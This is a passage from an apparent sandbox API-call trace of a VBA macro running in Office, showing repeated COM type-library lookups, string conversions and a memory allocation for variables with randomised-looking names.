lpWideCharStr="KXQAAoXx") returned 9 [0069.013] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KXQAAoXx", lHashVal=0x10c8c8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KXQAAoXx") returned 0x10c8c8 [0069.013] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="KXQAAoXx" | out: _Dst="KXQAAoXx") returned 0x0 [0069.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="KXQAAoXx") returned 9 [0069.013] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.013] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KXQAAoXx", lHashVal=0x10c8c8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.013] IUnknown:Release (This=0x665ba50) returned 0xd [0069.013] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.013] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KXQAAoXx", lHashVal=0x10c8c8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.013] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.013] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.013] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KXQAAoXx", lHashVal=0x10c8c8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.013] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.013] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.013] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KXQAAoXx", lHashVal=0x10c8c8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.014] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e42, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KXQAAoXx") returned 9 [0069.014] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KXQAAoXx", lHashVal=0x10c8c8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.014] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.014] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61e42 | out: _Dst=0x67c2d40) returned 0x0 [0069.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KXQAAoXx") returned 0x10a051 [0069.014] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_KXQAAoXx" | out: _Dst="_B_var_KXQAAoXx") returned 0x0 [0069.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_KXQAAoXx") returned 16 [0069.014] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.014] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KXQAAoXx", lHashVal=0x10a051, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.014] IUnknown:Release (This=0x665ba50) returned 0xd [0069.014] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.014] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KXQAAoXx", lHashVal=0x10a051, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.014] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.014] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.014] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KXQAAoXx", lHashVal=0x10a051, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.014] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.014] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.014] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KXQAAoXx", lHashVal=0x10a051, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.014] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.014] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.014] IUnknown:Release (This=0x665ba50) returned 0xd [0069.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10a0e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_KXQAAoXx") returned 16 [0069.014] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KXQAAoXx", lHashVal=0x10a051, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.014] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61e42 | out: _Dst=0x144ec0) returned 0x0 [0069.014] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.015] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.015] IUnknown:Release (This=0x665ba50) returned 0xd [0069.015] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.015] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.015] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.015] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.015] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.015] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.015] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.015] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.015] IUnknown:Release (This=0x665ba50) returned 0xd [0069.015] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.015] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.015] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.015] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.015] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.015] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.015] IUnknown:Release (This=0x665ba50) returned 0xd [0069.015] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.015] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.015] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.015] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.015] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.016] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.016] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.016] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.016] IUnknown:Release (This=0x665ba50) returned 0xd [0069.016] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.016] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.016] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.016] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.016] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.016] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.016] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.016] IUnknown:Release (This=0x665ba50) returned 0xd [0069.016] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.016] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.016] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ce0000 [0069.017] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.017] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.017] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.017] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.017] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.017] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.017] IUnknown:Release (This=0x665ba50) returned 0xd [0069.017] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.017] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.017] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.017] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.017] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.017] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.017] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.018] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.018] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.018] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.018] IUnknown:Release (This=0x665ba50) returned 0xd [0069.018] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.018] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.018] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.018] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.018] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.018] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.018] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.018] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.018] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.018] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.018] IUnknown:Release (This=0x665ba50) returned 0xd [0069.018] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.018] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.018] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d96, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jDw1oAUB") returned 9 [0069.018] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jDw1oAUB", lHashVal=0x10c306, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d96, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jDw1oAUB") returned 9 [0069.019] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jDw1oAUB", lHashVal=0x10c306, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d96, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jDw1oAUB") returned 9 [0069.019] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jDw1oAUB", lHashVal=0x10c306, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.019] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jDw1oAUB") returned 0x10c306 [0069.019] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="jDw1oAUB" | out: _Dst="jDw1oAUB") returned 0x0 [0069.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="jDw1oAUB") returned 9 [0069.019] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.019] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jDw1oAUB", lHashVal=0x10c306, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.019] IUnknown:Release (This=0x665ba50) returned 0xd [0069.019] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.019] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jDw1oAUB", lHashVal=0x10c306, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.019] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.019] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.019] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jDw1oAUB", lHashVal=0x10c306, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.019] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.019] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.019] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jDw1oAUB", lHashVal=0x10c306, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.019] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d96, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jDw1oAUB") returned 9 [0069.019] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jDw1oAUB", lHashVal=0x10c306, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.019] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.019] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61d96 | out: _Dst=0x67c2d40) returned 0x0 [0069.019] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jDw1oAUB") returned 0x109a8f [0069.020] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_jDw1oAUB" | out: _Dst="_B_var_jDw1oAUB") returned 0x0 [0069.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_jDw1oAUB") returned 16 [0069.020] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.020] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jDw1oAUB", lHashVal=0x109a8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.020] IUnknown:Release (This=0x665ba50) returned 0xd [0069.020] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.020] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jDw1oAUB", lHashVal=0x109a8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.020] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.020] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.020] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jDw1oAUB", lHashVal=0x109a8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.020] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.020] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.020] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jDw1oAUB", lHashVal=0x109a8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.020] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.020] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.020] IUnknown:Release (This=0x665ba50) returned 0xd [0069.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10a3e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_jDw1oAUB") returned 16 [0069.020] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jDw1oAUB", lHashVal=0x109a8f, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x6f003100000000, pDummy=0x0 | out: 